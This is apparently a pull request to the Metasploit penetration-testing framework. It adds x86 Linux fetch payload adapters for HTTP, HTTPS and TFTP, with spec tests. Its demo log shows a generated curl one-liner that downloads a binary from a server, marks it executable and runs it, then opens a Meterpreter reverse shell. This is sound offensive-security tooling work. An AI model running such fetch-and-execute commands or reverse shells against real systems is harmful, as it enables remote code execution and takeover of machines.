### PR TITLE
Add x86 Linux Fetch Payloads

### DIFF
--- a/modules/payloads/adapters/cmd/linux/http/x86.rb
+++ b/modules/payloads/adapters/cmd/linux/http/x86.rb
@@ -4,20 +4,20 @@
 ##
 
 module MetasploitModule
-  include Msf::Payload::Adapter::Fetch::Https
+  include Msf::Payload::Adapter::Fetch::HTTP
   include Msf::Payload::Adapter::Fetch::LinuxOptions
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'HTTPS Fetch',
-        'Description' => 'Fetch and execute an MIPS64 payload from an HTTPS server.',
+        'Name' => 'HTTP Fetch',
+        'Description' => 'Fetch and execute a x86 payload from an HTTP server.',
         'Author' => ['Brendan Watters', 'Spencer McIntyre'],
         'Platform' => 'linux',
         'Arch' => ARCH_CMD,
         'License' => MSF_LICENSE,
-        'AdaptedArch' => ARCH_MIPS64,
+        'AdaptedArch' => ARCH_X86,
         'AdaptedPlatform' => 'linux'
       )
     )

--- a/modules/payloads/adapters/cmd/linux/https/x86.rb
+++ b/modules/payloads/adapters/cmd/linux/https/x86.rb
@@ -12,12 +12,12 @@ module MetasploitModule
       update_info(
         info,
         'Name' => 'HTTPS Fetch',
-        'Description' => 'Fetch and execute an MIPS64 payload from an HTTPS server.',
+        'Description' => 'Fetch and execute an x86 payload from an HTTPS server.',
         'Author' => ['Brendan Watters', 'Spencer McIntyre'],
         'Platform' => 'linux',
         'Arch' => ARCH_CMD,
         'License' => MSF_LICENSE,
-        'AdaptedArch' => ARCH_MIPS64,
+        'AdaptedArch' => ARCH_X86,
         'AdaptedPlatform' => 'linux'
       )
     )

--- a/modules/payloads/adapters/cmd/linux/tftp/x86.rb
+++ b/modules/payloads/adapters/cmd/linux/tftp/x86.rb
@@ -4,20 +4,20 @@
 ##
 
 module MetasploitModule
-  include Msf::Payload::Adapter::Fetch::Https
+  include Msf::Payload::Adapter::Fetch::TFTP
   include Msf::Payload::Adapter::Fetch::LinuxOptions
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'HTTPS Fetch',
-        'Description' => 'Fetch and execute an MIPS64 payload from an HTTPS server.',
+        'Name' => 'TFTP Fetch',
+        'Description' => 'Fetch and execute a x86 payload from a TFTP server.',
         'Author' => ['Brendan Watters', 'Spencer McIntyre'],
         'Platform' => 'linux',
         'Arch' => ARCH_CMD,
         'License' => MSF_LICENSE,
-        'AdaptedArch' => ARCH_MIPS64,
+        'AdaptedArch' => ARCH_X86,
         'AdaptedPlatform' => 'linux'
       )
     )

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -556,6 +556,30 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'cmd/linux/tftp/x64'
   end
 
+  context 'cmd/linux/http/x86' do
+    it_should_behave_like 'payload is not cached',
+                          ancestor_reference_names: [
+                            'adapters/cmd/linux/http/x86'
+                          ],
+                          reference_name: 'cmd/linux/http/x86'
+  end
+
+  context 'cmd/linux/https/x86' do
+    it_should_behave_like 'payload is not cached',
+                          ancestor_reference_names: [
+                            'adapters/cmd/linux/https/x86'
+                          ],
+                          reference_name: 'cmd/linux/https/x86'
+  end
+
+  context 'cmd/linux/tftp/x86' do
+    it_should_behave_like 'payload is not cached',
+                          ancestor_reference_names: [
+                            'adapters/cmd/linux/tftp/x86'
+                          ],
+                          reference_name: 'cmd/linux/tftp/x86'
+  end
+
   context 'cmd/mainframe/generic_jcl' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
This adds x86 fetch-based payloads to the existing x64 ones we originally added.

I tested this with a x64 Fedora virtual machine. Both HTTP and TFTP servers were tested with the curl command.

## Testing

- [x] Use one of the new `cmd/linux/http/x86/*` payloads
- [x] Configure the datastore options and start the handler
- [x] Generate the payload and run it
- [x] Get a session


## Demo

```
msf6 payload(cmd/linux/tftp/x86/meterpreter/reverse_tcp) > show  options 

Module options (payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cyuYnoVkxH       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       192.168.159.128  yes       Local IP to use for serving payload
   FETCH_SRVONCE       true             yes       Stop serving the payload after it is retrieved
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/tftp/x86/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 5

[*] Started reverse TCP handler on 192.168.159.128:4444 
msf6 payload(cmd/linux/tftp/x86/meterpreter/reverse_tcp) > generate -f raw
curl -so /tmp/cyuYnoVkxH tftp://192.168.159.128:8080/zk7J-6sySNPGu7NIOHcx6A; chmod +x /tmp/cyuYnoVkxH; /tmp/cyuYnoVkxH &
msf6 payload(cmd/linux/tftp/x86/meterpreter/reverse_tcp) > curl -so /tmp/cyuYnoVkxH tftp://192.168.159.128:8080/zk7J-6sySNPGu7NIOHcx6A; chmod +x /tmp/cyuYnoVkxH; /tmp/cyuYnoVkxH &
[*] exec: curl -so /tmp/cyuYnoVkxH tftp://192.168.159.128:8080/zk7J-6sySNPGu7NIOHcx6A; chmod +x /tmp/cyuYnoVkxH; /tmp/cyuYnoVkxH &


[*] Sending stage (1017704 bytes) to 192.168.159.128
msf6 payload(cmd/linux/tftp/x86/meterpreter/reverse_tcp) > [*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.128:47320) at 2023-06-09 16:53:31 -0400

msf6 payload(cmd/linux/tftp/x86/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > getuid
Server username: smcintyre
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 36 (Linux 6.2.15-100.fc36.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```